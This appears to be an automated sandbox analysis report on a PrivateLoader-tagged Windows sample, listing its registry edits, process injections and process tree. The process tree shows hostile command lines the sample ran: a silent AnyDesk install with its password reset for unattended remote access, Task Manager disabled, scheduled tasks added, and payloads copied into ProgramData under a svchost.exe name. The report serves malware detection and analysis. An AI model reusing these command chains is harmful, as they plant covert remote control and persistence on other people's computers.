Malware Analysis Report

2025-01-02 08:02

Sample ID 240509-w945lagh4y
Target Goonscript.exe
SHA256 d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2
Tags: privateloader discovery evasion execution loader
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2

Threat Level: Known bad

The file Goonscript.exe was found to be: Known bad.

Malicious Activity Summary

privateloader discovery evasion execution loader

PrivateLoader

Disables Task Manager via registry modification

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks installed software on the system

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies registry key

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 18:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 18:38

Reported

2024-05-09 18:40

Platform

win7-20240221-en

Max time kernel

100s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

Signatures

PrivateLoader

loader privateloader

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\AnyDesk.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\ = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421441773" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value omitted) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{51F21011-0E33-11EF-815A-6A55B5C6A64E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "yes" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\AutoHide = "yes" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\Total = "29" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000aef56000a9325e635ee5c7e8ab4c6739444f10c78e634c943d4b9e8bc19e5b98000000000e80000000020000200000004f5f3782c5a6922c1ec25a277c5c47aab494fc2061c30aa83ebd25f89232ebb320000000473e7a5d71b0f005436c7b3087a5c00e1dd2d81c44e8393496e2daf2759d00944000000088328a5a81bca919e5377338580630649dbf650ee99cd8950041073e53a569791708c6e05ddd1a1ed4f60862221d8d75aff86771c12fa46673dbfbfb25dfc610 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cd931740a2da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2012 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2380 wrote to memory of 2552 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2792 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3012 wrote to memory of 2984 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 1288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 1064 N/A C:\Windows\system32\wscript.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1064 wrote to memory of 1796 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Goonscript.exe

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://ctt.ac/Y6e79

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

